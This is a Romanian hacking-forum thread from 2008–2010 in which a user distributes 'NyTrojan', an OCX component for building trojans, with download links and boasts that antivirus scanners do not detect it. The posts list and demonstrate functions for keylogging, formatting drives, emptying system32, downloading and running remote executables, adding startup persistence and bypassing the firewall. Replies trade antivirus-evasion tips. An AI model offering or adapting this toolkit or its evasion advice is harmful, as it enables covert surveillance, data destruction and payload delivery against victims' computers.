[RST] NyTrojan v1.02 FUD

Nytro · June 16, 2008

::::: NyTrojan OCX :::::::

:::::: © Nytro 2008 :::::::

::: http://rstcenter.com :::

Aceeasi prostie , 100% nedetectabila , lipsa de ocupatie .

File : NyTrojan.OCX

Size : 76.0 KB

Download :

http://rapidshare.com/files/122825689/NyTrOjan.ocx

http://www.speedyshare.com/396218378.html

Functii :

1) OpenCDRom

2) CloseCDRom

3) ShowTaskBar

4) HideTaskBar

5) HideMouse

6) ShowMouse

7) LockExe

8) UnLockExe

9) HideClock

10) ShowClock

11) HideStart

12) ShowStart

13) HideIcons

14) ShowIcons

15) DisableTaskManager

16) EnableTaskManager

17) EmptyFolder

18) DesktopFolderFlood

19) DesktopFolderDelete

20) DisableSystemRestore

21) EnableSystemRestore

22) KillProcess

23) AutoDownload

24) SetStartButtonCaption

25) AddToStartUp

26) FreezeMouse

27) StopFreezeMouse

28) CrazyMouse

29) StopCrazyMouse

30) BeepFlood

31) StopBeepFlood

32) Abort

33) LogOff

34) ShutDown

35) Restart

36) Author

37) OpenWebSite

38) FormatDrive

39) SwapMouseButtons

40) StopSwapMouseButtons

41) BypassWindowsFirewall

42) TurnOffMonitor

43) TurnOnMonitor

44) StartKeylogging

45) StopKeylogging

46) Keylog

De ce sa il foloiti ? Deoarece simplifica foarte mult munca ta

Inca nu am facut un trojan cu el , revin cu el , o sa il fac

Folosind aceste functii trojanul e 100% UD

Am incercat pe mine si au mers functiile , sa le incercati si voi

si daca nu merge o functie sa imi ziceti .

Aveti grija la numarul de parameri al functiilor , revin cu un edit

in care spun ce face fiecare functie si cum se foloseste .

L-am si scanat :

File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/33 (0%)

http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82d

Atentie : Daca folositi acest OCX e necesar fisierul pe calculatorul

victimei . Cum se poate face asta ? Cel mai simplu , o arhiva SFX , facuta

cu WinRAR . OCX-ul trebuie sa se afle in system32 .

Cum il folositi in Visual Basic ? Trebuie inregistrat :

Run >> regsvr32.exe C:\...\NyTrojan.OCX

Sau Apasati CTRL + T in Visual Basic / Components , si dati Browse .

Daca aveti probleme , sugestii etc , postati mai jos

Functiile OCX-ului :

1. DesktopFolderFlood = Creaza 1000 de foldere pe desktop

2. DesktopFolderDelete = Sterge folderele

3. EmptyFolder = Sterge toate fisierele dintr-un folder

Ex. NyTrojan1.EmptyFolder "C:\WINDOWS\system32"

4. KillProcess = Inchide un proces

Ex. NyTrojan1.KillProcess "winamp.exe"

5. AutoDownload = Descarca un fisier

Ex. NyTrojan1.AutoDownload "http://site.com/server.exe", "C:\x.exe", 1

Parametri : 1. Direct link , 2. Locatia , 3. Ruleaza dupa ?

1 - Ca sa ruleze dupa download

0 - Ca sa nu ruleze dupa download

6. SetStartButtonCaption = Seteaza numele butonului de start

Ex. NyTrojan1.SetStartButtonCaption "xxx"

7. AddToStartUp = Adauga la start-up un program

Ex. NyTrojan1.AddToStartUp "C:\x.exe"

8. BeepFlood = Beep-uri incontinuu

Ex. NyTrojan1.BeepFlood "100"

Parametrul reprezinta intervalul beep-urilor

9. OpenWebSite = Deschide WebSite cu IE

Ex. NyTrojan1.OpenWebSite "http://www.google.ro"

10. Author = Un MsgBox

11. FormatDrive = Formateaza o partitie

Ex. NyTrojan1.FormatDrive "a"

Info : Am incercat decat pe A:\ nu si pe C:\ sau D:\

12. StartKeylogging = Porneste Keylogging-ul

13. StopKeylogging = Opreste Keylogging-ul

14. Keylog = Returneaza Keylog-ul , tastele apasate dupa folosirea

functiei StartKeylogging

andr3y · June 17, 2008

cred ca ar trebui sa spui si cum se foloseste ca unii habar n`au :lol:

Nytro · June 17, 2008

Mersi DLD .

andr3y : Se foloseste ca orice OCX . Intri in VB , apesi CTRL + T , dai Browse , il pui pe Form si il folosesti in cod ca in exemplu .

Nytro · June 28, 2008

Scuze pentru dublu post , nu mai era deloc FUD , acum e din nou

File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/33 (0%)

http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82d

Download :

http://rapidshare.com/files/125661266/NyTrOjan.ocx

Dark Hacker 3k · June 28, 2008

Si nu era mai simplu sa incluzi ocx-ul in executabil, iar la pornire, inainte sa incarce programul sa verifice existenta acestuia, iar daca nu-l gaseste sa il creeze ? Eu asa fac la toate programele create de mine ... includ resursele in executabil. Ia-l ca pe un sfat pentru a-ti perfectiona metodele

Nytro · June 29, 2008

Try this : http://rapidshare.com/files/123498228/NyTrojan_RAT.rar

Screenshot : http://img229.imageshack.us/img229/7069/screenshotrx0.jpg

Dark Hacker 3k · June 29, 2008

Frumos, exact la asta ma refeream Apropo, ocx-ul si res-urile le vede ca virusi ... din pacate ... Incearca cu module si codul sursa direct in executabil, in modul asta mai pacalesti programele antivirus, cel putin deocamdata ..

PS: Trimite-mi te rog un mesaj privat cu id-ul tau de messenger ca sa vorbim mai usor despre anumite lucruri

Nytro · June 29, 2008

Nu prea inteleg antivirusii . Am facut niste teste cu Digital Keylogger . Asa cu l-am facut prima oara il detectau 4 antivirusi . Scot din cod autocopierea ocx-ului si il gasesc 5 parca . Apoi sterg tot codul din form si la decat declaratile si un modul care scrie in registry cu RegOpenKey ... Si il gasesc 7 antivirusi . Am sters bucati din cod si tot era detectabil . Am incercat fara autocopiere si bitdefender tot il gasea ca dropper . Nu prea inteleg cum sta treaba .

Dark Hacker 3k · June 29, 2008

La mine cel putin, la trojan acum l-am scanat cu virustotal (si apropo de asta, nu inseamna ca pe viitor il vor detecta antivirusii, fapt probat de mine). Are 31-32 antivirusi in lista si .. din ei doar 3 il vad acum ca fisier suspicios (nod32, sophos si panda), dar nici unul ca virus sigur. Daca scot codul pt auto start-up, il vede numai panda, tot ca suspicious file. Ma rog .. asta era inainte, de atunci l-am actualizat si acum nu l-am mai verificat, dar am fixat niste bug-uri si am adaugat codul pt o singura instanta (proces), etc. Oricum, asta nu are cu ce sa afecteze codul. La tine am impresia ca toata problema se invarte in jurul ocx-ului. incearca sa incluzi comenzile in program, sa nu te folosesti de nytro ocx

Edit: Am verificat acum si vad ca a sarit si BitDefender in cele din urma ... Ca o rezolvare,ar fi sa schimbam in primul rand codul pt intrare-registrii. Oricum, 4 din 33 (mai nou), e ceva, pt inceput.

Nytro · June 30, 2008

Nu am folosit deloc ocx , dar o sa fac un ocx special si va fi FUD . In ocx trebuie sa scriu in registry cu RegOpenKey si totul e OK

Dark Hacker 3k · June 30, 2008

Yup, si ti-as mai propune ceva: am vazut ca lucrezi in vb6. Dupa ce termini logger-ul, daca tot mai sare cate un antivirus, compileaza proiectul in vb8, (foloseste alt compilator) si ... cam atat. Eu asa am scapat de toti ceilalti, la o proba, insa ai si alte dezavantaje

Nytro · June 30, 2008

.NET Framework 3.5

ActionBoy · August 22, 2008

ma bag ca musca'n ciorba ...

un reupload pls?

Nytro · August 23, 2008

Rebuilt :

File NyTrOjan.ocx received on 08.23.2008 10:40:45 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 1/36 (2.78%)

http://rapidshare.com/files/139446616/NyTrOjan.ocx

MaX19 · November 21, 2008

nu e bun linkul

Nytro · November 21, 2008

Daca citeai postul de mai sus ...

Download : http://rapidshare.com/files/139446616/NyTrOjan.ocx

Rezultat: 12/36 (33.34%) : http://www.virustotal.com/ro/analisis/2bb0d0936ca08203c5aaf78b5642c6c3

_nobodY_ · February 13, 2009

nytro ii naspa ca trebuie sa ii dai si la victima nytrojan.ocx

daca vrei dami codu de open and close monitor

Nytro · February 13, 2009

Nu trebuie sa ii dai, il pui intr-un fisier de resursa in server.

Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private Const WM_SYSCOMMAND = &H112&

Private Const SC_MONITORPOWER = &HF170&

Public Function TurnOffMonitor()

SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 1&

End Function

Public Function TurnOnMonitor()

SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 0&

End Function

Hellbound · March 17, 2009

sursa ? poti s o dai pls ?

Nytro · March 18, 2009

Vezi tutorialul meu, apar acolo toate codurile si mai sunt si putin explicate.

ZoOmLeSs · July 21, 2009

Nytro imi poti da un link de download de lal Visual Basicul tau?

ArTh · September 7, 2010

un link de descarcare plz

Nytro · September 8, 2010

E vechi de 2 ani, nici nu cred ca il mai am (nu l-am gasit). Oricum e inutil, nu ai ce face cu el.

dark87 · September 9, 2010

Virustotal.com il strica numa e fud , foloseste novirusthanks2

BonesTDK · November 15, 2010

Multumim Nytro !

Sign In

[RST] NyTrojan v1.02 FUD

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation